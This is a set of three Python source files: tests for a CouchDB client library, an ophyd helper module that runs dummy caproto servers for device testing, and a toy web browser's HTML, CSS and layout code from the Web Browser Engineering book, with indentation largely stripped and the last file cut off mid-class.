self.assertNotEquals(old_rev, doc['_rev'])
self.assertEqual(None, self.db['foo'].get('_attachments'))
def test_empty_attachment(self):
doc = {}
self.db['foo'] = doc
old_rev = doc['_rev']
self.db.put_attachment(doc, '', 'empty.txt')
self.assertNotEquals(old_rev, doc['_rev'])
doc = self.db['foo']
attachment = doc['_attachments']['empty.txt']
self.assertEqual(0, attachment['length'])
def test_default_attachment(self):
doc = {}
self.db['foo'] = doc
self.assertTrue(self.db.get_attachment(doc, 'missing.txt') is None)
sentinel = object()
self.assertTrue(self.db.get_attachment(doc, 'missing.txt', sentinel) is sentinel)
def test_attachment_from_fs(self):
tmpdir = tempfile.mkdtemp()
tmpfile = os.path.join(tmpdir, 'test.txt')
f = open(tmpfile, 'w')
f.write('Hello!')
f.close()
doc = {}
self.db['foo'] = doc
self.db.put_attachment(doc, open(tmpfile))
doc = self.db.get('foo')
self.assertTrue(doc['_attachments']['test.txt']['content_type'] == 'text/plain')
shutil.rmtree(tmpdir)
def test_attachment_no_filename(self):
doc = {}
self.db['foo'] = doc
self.assertRaises(ValueError, self.db.put_attachment, doc, '')
def test_json_attachment(self):
doc = {}
self.db['foo'] = doc
self.db.put_attachment(doc, '{}', 'test.json', 'application/json')
self.assertEquals(self.db.get_attachment(doc, 'test.json').read(), '{}')
def test_include_docs(self):
doc = {'foo': 42, 'bar': 40}
self.db['foo'] = doc
rows = list(self.db.query(
'function(doc) { emit(doc._id, null); }',
include_docs=True
))
self.assertEqual(1, len(rows))
self.assertEqual(doc, rows[0].doc)
def test_query_multi_get(self):
for i in range(1, 6):
self.db.save({'i': i})
res = list(self.db.query('function(doc) { emit(doc.i, null); }',
keys=range(1, 6, 2)))
self.assertEqual(3, len(res))
for idx, i in enumerate(range(1, 6, 2)):
self.assertEqual(i, res[idx].key)
def test_bulk_update_conflict(self):
docs = [
dict(type='Person', name='John Doe'),
dict(type='Person', name='Mary Jane'),
dict(type='City', name='Gotham City')
]
self.db.update(docs)
# update the first doc to provoke a conflict in the next bulk update
doc = docs[0].copy()
self.db[doc['_id']] = doc
results = self.db.update(docs)
self.assertEqual(False, results[0][0])
assert isinstance(results[0][2], http.ResourceConflict)
def test_bulk_update_all_or_nothing(self):
docs = [
dict(type='Person', name='John Doe'),
dict(type='Person', name='Mary Jane'),
dict(type='City', name='Gotham City')
]
self.db.update(docs)
# update the first doc to provoke a conflict in the next bulk update
doc = docs[0].copy()
doc['name'] = 'Jane Doe'
self.db[doc['_id']] = doc
results = self.db.update(docs, all_or_nothing=True)
self.assertEqual(True, results[0][0])
doc = self.db.get(doc['_id'], conflicts=True)
assert '_conflicts' in doc
revs = self.db.get(doc['_id'], open_revs='all')
assert len(revs) == 2
def test_bulk_update_bad_doc(self):
self.assertRaises(TypeError, self.db.update, [object()])
def test_copy_doc(self):
self.db['foo'] = {'status': 'testing'}
result = self.db.copy('foo', 'bar')
self.assertEqual(result, self.db['bar'].rev)
def test_copy_doc_conflict(self):
self.db['bar'] = {'status': 'idle'}
self.db['foo'] = {'status': 'testing'}
self.assertRaises(http.ResourceConflict, self.db.copy, 'foo', 'bar')
def test_copy_doc_overwrite(self):
self.db['bar'] = {'status': 'idle'}
self.db['foo'] = {'status': 'testing'}
result = self.db.copy('foo', self.db['bar'])
doc = self.db['bar']
self.assertEqual(result, doc.rev)
self.assertEqual('testing', doc['status'])
def test_copy_doc_srcobj(self):
self.db['foo'] = {'status': 'testing'}
self.db.copy(self.db['foo'], 'bar')
self.assertEqual('testing', self.db['bar']['status'])
def test_copy_doc_destobj_norev(self):
self.db['foo'] = {'status': 'testing'}
self.db.copy('foo', {'_id': 'bar'})
self.assertEqual('testing', self.db['bar']['status'])
def test_copy_doc_src_dictlike(self):
class DictLike(object):
def __init__(self, doc):
self.doc = doc
def items(self):
return self.doc.items()
self.db['foo'] = {'status': 'testing'}
self.db.copy(DictLike(self.db['foo']), 'bar')
self.assertEqual('testing', self.db['bar']['status'])
def test_copy_doc_dest_dictlike(self):
class DictLike(object):
def __init__(self, doc):
self.doc = doc
def items(self):
return self.doc.items()
self.db['foo'] = {'status': 'testing'}
self.db['bar'] = {}
self.db.copy('foo', DictLike(self.db['bar']))
self.assertEqual('testing', self.db['bar']['status'])
def test_copy_doc_src_baddoc(self):
self.assertRaises(TypeError, self.db.copy, object(), 'bar')
def test_copy_doc_dest_baddoc(self):
self.assertRaises(TypeError, self.db.copy, 'foo', object())
def test_changes(self):
self.db['foo'] = {'bar': True}
self.assertEqual(self.db.changes(since=0)['last_seq'], 1)
first = self.db.changes(feed='continuous').next()
self.assertEqual(first['seq'], 1)
self.assertEqual(first['id'], 'foo')
def test_changes_releases_conn(self):
# Consume an entire changes feed to read the whole response, then check
# that the HTTP connection made it to the pool.
list(self.db.changes(feed='continuous', timeout=0))
scheme, netloc = urlparse.urlsplit(client.DEFAULT_BASE_URL)[:2]
self.assertTrue(self.db.resource.session.connection_pool.conns[(scheme, netloc)])
def test_changes_releases_conn_when_lastseq(self):
# Consume a changes feed, stopping at the 'last_seq' item, i.e. don't
# let the generator run any further, then check the connection made it
# to the pool.
for obj in self.db.changes(feed='continuous', timeout=0):
if 'last_seq' in obj:
break
scheme, netloc = urlparse.urlsplit(client.DEFAULT_BASE_URL)[:2]
self.assertTrue(self.db.resource.session.connection_pool.conns[(scheme, netloc)])
def test_changes_conn_usable(self):
# Consume a changes feed to get a used connection in the pool.
list(self.db.changes(feed='continuous', timeout=0))
# Try using the connection again to make sure the connection was left
# in a good state from the previous request.
self.assertTrue(self.db.info()['doc_count'] == 0)
def test_changes_heartbeat(self):
def wakeup():
time.sleep(.3)
self.db.save({})
threading.Thread(target=wakeup).start()
for change in self.db.changes(feed='continuous', heartbeat=100):
break
def test_purge(self):
doc = {'a': 'b'}
self.db['foo'] = doc
self.assertEqual(self.db.purge([doc])['purge_seq'], 1)
def test_json_encoding_error(self):
doc = {'now': datetime.now()}
self.assertRaises(TypeError, self.db.save, doc)
class ViewTestCase(testutil.TempDatabaseMixin, unittest.TestCase):
def test_row_object(self):
row = list(self.db.view('_all_docs', keys=['blah']))[0]
self.assertEqual(repr(row), "<Row key='blah', error='not_found'>")
self.assertEqual(row.id, None)
self.assertEqual(row.key, 'blah')
self.assertEqual(row.value, None)
self.assertEqual(row.error, 'not_found')
self.db.save({'_id': 'xyz', 'foo': 'bar'})
row = list(self.db.view('_all_docs', keys=['xyz']))[0]
self.assertEqual(row.id, 'xyz')
self.assertEqual(row.key, 'xyz')
self.assertEqual(row.value.keys(), ['rev'])
self.assertEqual(row.error, None)
def test_view_multi_get(self):
for i in range(1, 6):
self.db.save({'i': i})
self.db['_design/test'] = {
'language': 'javascript',
'views': {
'multi_key': {'map': 'function(doc) { emit(doc.i, null); }'}
}
}
res = list(self.db.view('test/multi_key', keys=range(1, 6, 2)))
self.assertEqual(3, len(res))
for idx, i in enumerate(range(1, 6, 2)):
self.assertEqual(i, res[idx].key)
def test_ddoc_info(self):
self.db['_design/test'] = {
'language': 'javascript',
'views': {
'test': {'map': 'function(doc) { emit(doc.type, null); }'}
}
}
info = self.db.info('test')
self.assertEqual(info['view_index']['compact_running'], False)
def test_view_compaction(self):
for i in range(1, 6):
self.db.save({'i': i})
self.db['_design/test'] = {
'language': 'javascript',
'views': {
'multi_key': {'map': 'function(doc) { emit(doc.i, null); }'}
}
}
self.db.view('test/multi_key')
self.assertTrue(self.db.compact('test'))
def test_view_cleanup(self):
for i in range(1, 6):
self.db.save({'i': i})
self.db['_design/test'] = {
'language': 'javascript',
'views': {
'multi_key': {'map': 'function(doc) { emit(doc.i, null); }'}
}
}
self.db.view('test/multi_key')
ddoc = self.db['_design/test']
ddoc['views'] = {
'ids': {'map': 'function(doc) { emit(doc._id, null); }'}
}
self.db.update([ddoc])
self.db.view('test/ids')
self.assertTrue(self.db.cleanup())
def test_view_function_objects(self):
if 'python' not in self.server.config()['query_servers']:
return
for i in range(1, 4):
self.db.save({'i': i, 'j':2*i})
def map_fun(doc):
yield doc['i'], doc['j']
res = list(self.db.query(map_fun, language='python'))
self.assertEqual(3, len(res))
for idx, i in enumerate(range(1,4)):
self.assertEqual(i, res[idx].key)
self.assertEqual(2*i, res[idx].value)
def reduce_fun(keys, values):
return sum(values)
res = list(self.db.query(map_fun, reduce_fun, 'python'))
self.assertEqual(1, len(res))
self.assertEqual(12, res[0].value)
def test_init_with_resource(self):
self.db['foo'] = {}
view = client.PermanentView(self.db.resource('_all_docs').url, '_all_docs')
self.assertEquals(len(list(view())), 1)
def test_iter_view(self):
self.db['foo'] = {}
view = client.PermanentView(self.db.resource('_all_docs').url, '_all_docs')
self.assertEquals(len(list(view)), 1)
def test_tmpview_repr(self):
mapfunc = "function(doc) {emit(null, null);}"
view = client.TemporaryView(self.db.resource('_temp_view'), mapfunc)
self.assertTrue('TemporaryView' in repr(view))
self.assertTrue(mapfunc in repr(view))
def test_wrapper_iter(self):
class Wrapper(object):
def __init__(self, doc):
pass
self.db['foo'] = {}
self.assertTrue(isinstance(list(self.db.view('_all_docs', wrapper=Wrapper))[0], Wrapper))
def test_wrapper_rows(self):
class Wrapper(object):
def __init__(self, doc):
pass
self.db['foo'] = {}
self.assertTrue(isinstance(self.db.view('_all_docs', wrapper=Wrapper).rows[0], Wrapper))
def test_properties(self):
for attr in ['rows', 'total_rows', 'offset']:
self.assertTrue(getattr(self.db.view('_all_docs'), attr) is not None)
def test_rowrepr(self):
self.db['foo'] = {}
rows = list(self.db.query("function(doc) {emit(null, 1);}"))
self.assertTrue('Row' in repr(rows[0]))
self.assertTrue('id' in repr(rows[0]))
rows = list(self.db.query("function(doc) {emit(null, 1);}", "function(keys, values, combine) {return sum(values);}"))
self.assertTrue('Row' in repr(rows[0]))
self.assertTrue('id' not in repr(rows[0]))
class ShowListTestCase(testutil.TempDatabaseMixin, unittest.TestCase):
show_func = """
function(doc, req) {
return {"body": req.id + ":" + (req.query.r || "<default>")};
}
"""
list_func = """
function(head, req) {
start({headers: {'Content-Type': 'text/csv'}});
if (req.query.include_header) {
send('id' + '\\r\\n');
}
var row;
while (row = getRow()) {
send(row.id + '\\r\\n');
}
}
"""
design_doc = {'_id': '_design/foo',
'shows': {'bar': show_func},
'views': {'by_id': {'map': "function(doc) {emit(doc._id, null)}"},
'by_name': {'map': "function(doc) {emit(doc.name, null)}"}},
'lists': {'list': list_func}}
def setUp(self):
super(ShowListTestCase, self).setUp()
# Workaround for possible bug in CouchDB. Adding a timestamp avoids a
# 409 Conflict error when pushing the same design doc that existed in a
# now deleted database.
design_doc = dict(self.design_doc)
design_doc['timestamp'] = time.time()
self.db.save(design_doc)
self.db.update([{'_id': '1', 'name': 'one'}, {'_id': '2', 'name': 'two'}])
def test_show_urls(self):
self.assertEqual(self.db.show('_design/foo/_show/bar')[1].read(), 'null:<default>')
self.assertEqual(self.db.show('foo/bar')[1].read(), 'null:<default>')
def test_show_docid(self):
self.assertEqual(self.db.show('foo/bar')[1].read(), 'null:<default>')
self.assertEqual(self.db.show('foo/bar', '1')[1].read(), '1:<default>')
self.assertEqual(self.db.show('foo/bar', '2')[1].read(), '2:<default>')
def test_show_params(self):
self.assertEqual(self.db.show('foo/bar', r='abc')[1].read(), 'null:abc')
def test_list(self):
self.assertEqual(self.db.list('foo/list', 'foo/by_id')[1].read(), '1\r\n2\r\n')
self.assertEqual(self.db.list('foo/list', 'foo/by_id', include_header='true')[1].read(), 'id\r\n1\r\n2\r\n')
def test_list_keys(self):
self.assertEqual(self.db.list('foo/list', 'foo/by_id', keys=['1'])[1].read(), '1\r\n')
def test_list_view_params(self):
self.assertEqual(self.db.list('foo/list', 'foo/by_name', startkey='o', endkey='p')[1].read(), '1\r\n')
self.assertEqual(self.db.list('foo/list', 'foo/by_name', descending=True)[1].read(), '2\r\n1\r\n')
class UpdateHandlerTestCase(testutil.TempDatabaseMixin, unittest.TestCase):
update_func = """
function(doc, req) {
if (!doc) {
if (req.id) {
return [{_id : req.id}, "new doc"]
}
return [null, "empty doc"];
}
doc.name = "hello";
return [doc, "hello doc"];
}
"""
design_doc = {'_id': '_design/foo',
'language': 'javascript',
'updates': {'bar': update_func}}
def setUp(self):
super(UpdateHandlerTestCase, self).setUp()
# Workaround for possible bug in CouchDB. Adding a timestamp avoids a
# 409 Conflict error when pushing the same design doc that existed in a
# now deleted database.
design_doc = dict(self.design_doc)
design_doc['timestamp'] = time.time()
self.db.save(design_doc)
self.db.update([{'_id': 'existed', 'name': 'bar'}])
def test_empty_doc(self):
self.assertEqual(self.db.update_doc('foo/bar')[1].read(), 'empty doc')
def test_new_doc(self):
self.assertEqual(self.db.update_doc('foo/bar', 'new')[1].read(), 'new doc')
def test_update_doc(self):
self.assertEqual(self.db.update_doc('foo/bar', 'existed')[1].read(), 'hello doc')
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(ServerTestCase, 'test'))
suite.addTest(unittest.makeSuite(DatabaseTestCase, 'test'))
suite.addTest(unittest.makeSuite(ViewTestCase, 'test'))
suite.addTest(unittest.makeSuite(ShowListTestCase, 'test'))
suite.addTest(unittest.makeSuite(UpdateHandlerTestCase, 'test'))
suite.addTest(doctest.DocTestSuite(client))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
utils.py
|
"""
Helpful functions that don't belong in a more specific submodule.
"""
import importlib
import logging
import os
import pkgutil
import signal
import uuid
from contextlib import contextmanager
from inspect import isclass, isfunction
from multiprocessing import Process
from ophyd.signal import EpicsSignalBase
logger = logging.getLogger(__name__)
_optional_err = ('Optional dependency caproto missing from python '
'environment. Cannot test server.')
try:
from caproto.server import PVGroup, pvproperty, run
has_caproto = True
except ImportError:
has_caproto = False
logger.debug(_optional_err)
def run_caproto_ioc(device_class, prefix):
"""
Runs a dummy caproto IOC.
Includes all the PVs that device_class will have if instantiated with
prefix.
Assumes only basic :class:`ophyd.Component` instances in the class
definition.
"""
if not has_caproto:
raise ImportError(_optional_err)
pvprops = {}
for suffix in yield_all_suffixes(device_class):
pvprops[suffix] = pvproperty()
DynIOC = type('DynIOC', (PVGroup,), pvprops)
ioc = DynIOC(prefix)
run(ioc.pvdb, module_name='caproto.asyncio.server',
interfaces=['0.0.0.0'])
def yield_all_suffixes(device_class):
"""
Iterates through all full pvname suffixes defined by device_class.
Assumes only basic :class:`ophyd.Component` instances in the class
definition.
"""
for walk in device_class.walk_components():
if issubclass(walk.item.cls, EpicsSignalBase):
suffix = get_suffix(walk)
yield suffix
def get_suffix(walk):
"""
Returns the full pvname suffix from a ComponentWalk instance.
This means everything after the top-level device's prefix.
Assumes that walk is an :class:`ophyd.signal.EpicsSignalBase`
subclass and that it was defined using only
:class:`ophyd.Component` in the device ancestors tree.
"""
suffix = ''
for cls, attr in zip(walk.ancestors, walk.dotted_name.split('.')):
suffix += getattr(cls, attr).suffix
return suffix
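def _example_suffixes():
    """Hedged usage sketch (not used elsewhere in this module): what
    yield_all_suffixes produces for a small, hypothetical two-level device."""
    from ophyd import Component as Cpt, Device, EpicsSignal
    class Inner(Device):
        c = Cpt(EpicsSignal, ':C')
    class Outer(Device):
        a = Cpt(EpicsSignal, ':A')
        b = Cpt(Inner, ':B')
    # Expected: [':A', ':B:C'] -- each EpicsSignal's Component suffixes
    # concatenated from the top-level device down.
    return list(yield_all_suffixes(Outer))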
@contextmanager
def caproto_context(device_class, prefix):
"""
    Context manager that runs a caproto IOC serving all PVs of the input device.
The caproto IOC will be run in a background process, making it suitable for
testing devices in the main process.
"""
if not has_caproto:
raise ImportError(_optional_err)
proc = Process(target=run_caproto_ioc, args=(device_class, prefix))
proc.start()
yield
if proc.is_alive():
os.kill(proc.pid, signal.SIGKILL)
def random_prefix():
"""Returns a random prefix to avoid test cross-talk."""
return str(uuid.uuid4())[:8] + ':'
def is_native(obj, module):
"""
Determines if obj was defined in module.
Returns True if obj was defined in this module.
Returns False if obj was not defined in this module.
Returns None if we can't figure it out, e.g. if this is a primitive type.
"""
try:
return module.__name__ in obj.__module__
except (AttributeError, TypeError):
return None
def get_native_functions(module):
"""Returns a set of all functions and methods defined in module."""
return get_native_methods(module, module)
def get_native_methods(cls, module, *, native_methods=None, seen=None):
"""Returns a set of all methods defined in cls that belong to module."""
if native_methods is None:
native_methods = set()
if seen is None:
seen = set()
for obj in cls.__dict__.values():
try:
if obj in seen:
continue
seen.add(obj)
except TypeError:
# Unhashable type, definitely not a class or function
continue
if not is_native(obj, module):
continue
elif isclass(obj):
get_native_methods(obj, module, native_methods=native_methods,
seen=seen)
elif isfunction(obj):
native_methods.add(obj)
return native_methods
def get_submodules(module_name):
"""Returns a list of the imported module plus all submodules."""
submodule_names = get_submodule_names(module_name)
return import_modules(submodule_names)
def get_submodule_names(module_name):
"""
Returns a list of the module name plus all importable submodule names.
"""
module = importlib.import_module(module_name)
submodule_names = [module_name]
try:
module_path = module.__path__
except AttributeError:
# This attr is missing if there are no submodules
return submodule_names
for _, submodule_name, is_pkg in pkgutil.walk_packages(module_path):
if submodule_name != '__main__':
full_submodule_name = module_name + '.' + submodule_name
submodule_names.append(full_submodule_name)
if is_pkg:
subsubmodule_names = get_submodule_names(full_submodule_name)
submodule_names.extend(subsubmodule_names)
return submodule_names
def import_modules(modules):
"""
Utility function to import an iterator of module names as a list.
Skips over modules that are not importable.
"""
module_objects = []
for module_name in modules:
try:
module_objects.append(importlib.import_module(module_name))
except ImportError:
pass
return module_objects
|
lab12.py
|
"""
This file compiles the code in Web Browser Engineering,
up to and including Chapter 12 (Scheduling and Threading),
without exercises.
"""
import argparse
import dukpy
import functools
import socket
import ssl
import time
import threading
import tkinter
import tkinter.font
from lab10 import request
class Timer:
def __init__(self):
self.phase = None
self.time = None
self.accumulated = 0
def reset(self):
self.accumulated = 0
def start(self, name):
if self.phase: self.stop()
self.phase = name
self.time = time.time()
def stop(self):
dt = time.time() - self.time
print("[{:>10.6f}] {}".format(dt, self.phase))
self.phase = None
self.accumulated += dt
def print_accumulated(self):
print("[{:>10.6f}] {}\n".format(self.accumulated, "Total"))
def url_origin(url):
return "/".join(url.split("/")[:3])
class Text:
def __init__(self, text):
self.text = text
def __repr__(self):
return "\"" + self.text.replace("\n", "\\n") + "\""
SELF_CLOSING_TAGS = [
"area", "base", "br", "col", "embed", "hr", "img", "input",
"link", "meta", "param", "source", "track", "wbr",
]
class Tag:
def __init__(self, text):
parts = text.split()
self.tag = parts[0].lower()
self.attributes = {}
for attrpair in parts[1:]:
if "=" in attrpair:
key, value = attrpair.split("=", 1)
if len(value) > 2 and value[0] in ["'", "\""]:
value = value[1:-1]
self.attributes[key.lower()] = value
else:
self.attributes[attrpair.lower()] = ""
def __repr__(self):
return "<" + self.tag + ">"
def lex(body):
out = []
text = ""
in_tag = False
for c in body:
if c == "<":
in_tag = True
if text: out.append(Text(text))
text = ""
elif c == ">":
in_tag = False
out.append(Tag(text))
text = ""
else:
text += c
if not in_tag and text:
out.append(Text(text))
return out
class ElementNode:
def __init__(self, tag, attributes):
self.tag = tag
self.attributes = attributes
self.children = []
self.style = {}
for pair in self.attributes.get("style", "").split(";"):
if ":" not in pair: continue
prop, val = pair.split(":")
self.style[prop.strip().lower()] = val.strip()
def __repr__(self):
return "<" + self.tag + ">"
class TextNode:
def __init__(self, text):
self.text = text
self.tag = None
self.children = []
def __repr__(self):
return self.text.replace("\n", "\\n")
def parse(tokens):
currently_open = []
for tok in tokens:
implicit_tags(tok, currently_open)
if isinstance(tok, Text):
node = TextNode(tok.text)
if not currently_open: continue
node.parent = currently_open[-1]
currently_open[-1].children.append(node)
elif tok.tag.startswith("/"):
node = currently_open.pop()
if not currently_open: return node
currently_open[-1].children.append(node)
elif tok.tag in SELF_CLOSING_TAGS:
node = ElementNode(tok.tag, tok.attributes)
node.parent = currently_open[-1]
currently_open[-1].children.append(node)
elif tok.tag.startswith("!"):
continue
else:
node = ElementNode(tok.tag, tok.attributes)
node.parent = currently_open[-1]
currently_open.append(node)
while currently_open:
node = currently_open.pop()
if not currently_open: return node
currently_open[-1].children.append(node)
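# Hedged sketch (not part of the original lab code): lex + parse turn markup into
# a tree of ElementNode/TextNode objects, with implicit html/body tags added.
def _example_parse_tree():
    tree = parse(lex("<p>hi</p>"))
    # tree is the implicit <html> root; tree.children[0] is the implicit <body>,
    # whose only child is the <p> element wrapping the TextNode "hi".
    return tree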
HEAD_TAGS = [
"base", "basefont", "bgsound", "noscript",
"link", "meta", "title", "style", "script",
]
def implicit_tags(tok, currently_open):
tag = tok.tag if isinstance(tok, Tag) else None
while True:
open_tags = [node.tag for node in currently_open]
if open_tags == [] and tag != "html":
node = ElementNode("html", {})
node.parent = None
currently_open.append(node)
elif open_tags == ["html"] and tag not in ["head", "body", "/html"]:
if tag in HEAD_TAGS:
implicit = "head"
else:
implicit = "body"
node = ElementNode(implicit, {})
node.parent = currently_open[-1]
currently_open.append(node)
elif open_tags == ["html", "head"] and tag not in ["/head"] + HEAD_TAGS:
node = currently_open.pop()
currently_open[-1].children.append(node)
else:
break
class CSSParser:
def __init__(self, s):
self.s = s
def whitespace(self, i):
while i < len(self.s) and self.s[i].isspace():
i += 1
return None, i
def literal(self, i, literal):
l = len(literal)
assert self.s[i:i+l] == literal
return None, i + l
def word(self, i):
j = i
        while j < len(self.s) and (self.s[j].isalnum() or self.s[j] in "-."):
j += 1
assert j > i
return self.s[i:j], j
def pair(self, i):
prop, i = self.word(i)
_, i = self.whitespace(i)
_, i = self.literal(i, ":")
_, i = self.whitespace(i)
val, i = self.word(i)
return (prop.lower(), val), i
def ignore_until(self, i, chars):
while i < len(self.s) and self.s[i] not in chars:
i += 1
return None, i
def body(self, i):
pairs = {}
_, i = self.literal(i, "{")
_, i = self.whitespace(i)
while i < len(self.s) and self.s[i] != "}":
try:
(prop, val), i = self.pair(i)
pairs[prop] = val
_, i = self.whitespace(i)
_, i = self.literal(i, ";")
except AssertionError:
_, i = self.ignore_until(i, [";", "}"])
if i < len(self.s) and self.s[i] == ";":
_, i = self.literal(i, ";")
_, i = self.whitespace(i)
_, i = self.literal(i, "}")
return pairs, i
def selector(self, i):
if self.s[i] == "#":
_, i = self.literal(i, "#")
name, i = self.word(i)
return IdSelector(name), i
elif self.s[i] == ".":
_, i = self.literal(i, ".")
name, i = self.word(i)
return ClassSelector(name), i
else:
name, i = self.word(i)
return TagSelector(name.lower()), i
def rule(self, i):
selector, i = self.selector(i)
_, i = self.whitespace(i)
body, i = self.body(i)
return (selector, body), i
def file(self, i):
rules = []
_, i = self.whitespace(i)
while i < len(self.s):
try:
rule, i = self.rule(i)
rules.append(rule)
except AssertionError:
_, i = self.ignore_until(i, "}")
_, i = self.literal(i, "}")
_, i = self.whitespace(i)
return rules, i
def parse(self):
rules, _ = self.file(0)
return rules
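# Hedged sketch (not part of the original lab code): the parser above turns a tiny
# stylesheet into (selector, property-dict) rules.
def _example_css_rules():
    rules = CSSParser("p { color: blue; font-size: 16px }").parse()
    # One rule: a TagSelector for 'p' paired with
    # {'color': 'blue', 'font-size': '16px'}.
    return rules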
class TagSelector:
def __init__(self, tag):
self.tag = tag
def matches(self, node):
return self.tag == node.tag
def priority(self):
return 1
class ClassSelector:
def __init__(self, cls):
self.cls = cls
def matches(self, node):
return self.cls in node.attributes.get("class", "").split()
def priority(self):
return 16
class IdSelector:
def __init__(self, id):
self.id = id
def matches(self, node):
return self.id == node.attributes.get("id", "")
def priority(self):
return 256
INHERITED_PROPERTIES = {
"font-style": "normal",
"font-weight": "normal",
"font-size": "16px",
"color": "black",
}
def style(node, parent, rules):
if isinstance(node, TextNode):
node.style = parent.style
else:
for selector, pairs in rules:
if selector.matches(node):
for property in pairs:
if property not in node.style:
node.style[property] = pairs[property]
for property, default in INHERITED_PROPERTIES.items():
if property not in node.style:
if parent:
node.style[property] = parent.style[property]
else:
node.style[property] = default
for child in node.children:
style(child, node, rules)
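# Minimal illustration of the cascade above (assumed example rule): given
# [(TagSelector("p"), {"color": "blue"})], style() copies "color: blue" onto every
# matching ElementNode, then fills any property in INHERITED_PROPERTIES that is
# still unset from the parent's computed style (or from the default on the root).
# TextNodes simply share their parent's style dict.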
WIDTH, HEIGHT = 800, 600
HSTEP, VSTEP = 13, 18
SCROLL_STEP = 100
class LineLayout:
def __init__(self, node, parent):
self.node = node
self.parent = parent
self.cx = 0
self.laid_out = False
self.children = []
def append(self, child):
self.children.append(child)
child.parent = self
self.cx += child.w + child.font.measure(" ")
def size(self):
self.w = self.parent.w
self.compute_height()
def compute_height(self):
if not self.children:
self.h = 0
self.max_ascent = 0
self.max_descent = 0
self.metrics = None
self.cxs = []
return
self.metrics = [child.font.metrics() for child in self.children]
self.max_ascent = max([metric["ascent"] for metric in self.metrics])
self.max_descent = max([metric["descent"] for metric in self.metrics])
self.h = 1.25 * (self.max_descent + self.max_ascent)
cx = 0
self.cxs = []
for child in self.children:
self.cxs.append(cx)
cx += child.w + child.font.measure(" ")
def position(self):
baseline = self.y + 1.25 * self.max_ascent
if self.children:
for cx, child, metrics in \
zip(self.cxs, self.children, self.metrics):
child.x = self.x + cx
child.y = baseline - metrics["ascent"]
def paint(self, to):
for child in self.children:
child.paint(to)
FONT_CACHE = {}
def GetFont(size, weight, style):
key = (size, weight, style)
value = FONT_CACHE.get(key)
if value: return value
value = tkinter.font.Font(size=size, weight=weight, slant=style)
FONT_CACHE[key] = value
return value
class TextLayout:
def __init__(self, node, word):
self.node = node
self.children = []
self.word = word
self.display_item = None
def size(self):
self.display_item = None
weight = self.node.style["font-weight"]
style = self.node.style["font-style"]
if style == "normal": style = "roman"
size = int(px(self.node.style["font-size"]) * .75)
self.font = GetFont(size, weight, style)
self.w = self.font.measure(self.word)
self.compute_height()
def compute_height(self):
self.h = self.font.metrics('linespace')
def position(self):
pass
def paint(self, to):
if not self.display_item:
color = self.node.style["color"]
self.display_item = DrawText(self.x, self.y, self.word, self.font, color)
to.append(self.display_item)
class InputLayout:
def __init__(self, node):
self.node = node
self.children = []
def size(self):
weight = self.node.style["font-weight"]
style = self.node.style["font-style"]
if style == "normal": style = "roman"
size = int(px(self.node.style["font-size"]) * .75)
self.font = tkinter.font.Font(size=size, weight=weight, slant=style)
self.w = 200
self.compute_height()
def compute_height(self):
self.h = 20
def position(self):
pass
def paint(self, to):
x1, x2 = self.x, self.x + self.w
y1, y2 = self.y, self.y + self.h
bgcolor = "light gray" if self.node.tag == "input" else "yellow"
to.append(DrawRect(x1, y1, x2, y2, bgcolor))
if self.node.tag == "input":
text = self.node.attributes.get("value", "")
else:
text = self.node.children[0].text
color = self.node.style["color"]
to.append(DrawText(self.x, self.y, text, self.font, color))
class InlineLayout:
def __init__(self, node, parent):
self.node = node
self.parent = parent
def size(self):
self.children = [LineLayout(self.node, self)]
self.mt = self.bt = self.pt = 0
self.mr = self.br = self.pr = 0
self.mb = self.bb = self.pb = 0
self.ml = self.bl = self.pl = 0
self.w = self.parent.w - self.parent.pl - self.parent.pr \
- self.parent.bl - self.parent.br
self.recurse(self.node)
self.flush()
self.children.pop()
self.compute_height()
def compute_height(self):
self.h = 0
for child in self.children:
self.h += child.h
def recurse(self, node):
if isinstance(node, TextNode):
self.text(node)
elif node.tag == "br":
self.flush()
elif node.tag == "input":
self.input(node)
elif node.tag == "button":
self.input(node)
else:
for child in node.children:
self.recurse(child)
def text(self, node):
for word in node.text.split():
child = TextLayout(node, word)
child.size()
if self.children[-1].cx + child.w > self.w:
self.flush()
self.children[-1].append(child)
def input(self, node):
child = InputLayout(node)
child.size()
if self.children[-1].cx + child.w > self.w:
self.flush()
self.children[-1].append(child)
def flush(self):
child = self.children[-1]
child.size()
self.children.append(LineLayout(self.node, self))
def position(self):
cy = self.y
for child in self.children:
child.x = self.x
child.y = cy
child.position()
cy += child.h
def paint(self, to):
for child in self.children:
child.paint(to)
def px(s):
if s.endswith("px"):
return int(s[:-2])
else:
return 0
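# For reference: px("16px") -> 16, while values without a "px" suffix,
# e.g. px("auto") or px("1em"), fall back to 0.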
class BlockLayout:
def __init__(self, node, parent):
self.node = node
self.parent = parent
self.x = -1
self.y = -1
self.w = -1
self.h = -1
def has_block_children(self):
for child in self.node.children:
if isinstance(child, TextNode):
if not child.text.isspace():
return False
elif child.style.get("display", "block") == "inline":
return False
return True
def size(self):
self.children = []
# block layout here
if self.has_block_children():
for child in self.node.children:
if isinstance(child, TextNode): continue
self.children.append(BlockLayout(child, self))
else:
self.children.append(InlineLayout(self.node, self))
self.mt = px(self.node.style.get("margin-top", "0px"))
self.bt = px(self.node.style.get("border-top-width", "0px"))
self.pt = px(self.node.style.get("padding-top", "0px"))
self.mr = px(self.node.style.get("margin-right", "0px"))
self.br = px(self.node.style.get("border-right-width", "0px"))
self.pr = px(self.node.style.get("padding-right", "0px"))
self.mb = px(self.node.style.get("margin-bottom", "0px"))
self.bb = px(self.node.style.get("border-bottom-width", "0px"))
self.pb = px(self.node.style.get("padding-bottom", "0px"))
self.ml = px(self.node.style.get("margin-left", "0px"))
self.bl = px(self.node.style.get("border-left-width", "0px"))
self.pl = px(self.node.style.get("padding-left", "0px"))
self.w = self.parent.w - self.parent.pl - self.parent.pr \
- self.parent.bl - self.parent.br \
- self.ml - self.mr
for child in self.children:
child.size()
self.compute_height()
def compute_height(self):
self.h = 0
for child in self.children:
self.h += child.mt + child.h + child.mb
def position(self):
self.y += self.mt
self.x += self.ml
y = self.y
for child in self.children:
child.x = self.x + self.pl + self.bl
child.y = y
child.position()
y += child.mt + child.h + child.mb
def paint(self, to):
if self.node.tag == "pre":
x2, y2 = self.x + self.w, self.y + self.h
to.append(DrawRect(self.x, self.y, x2, y2, "gray"))
for child in self.children:
child.paint(to)
class DocumentLayout:
def __init__(self, node):
self.node = node
self.parent = None
self.children = []
self.x = -1
self.y = -1
self.w = -1
self.h = -1
def size(self):
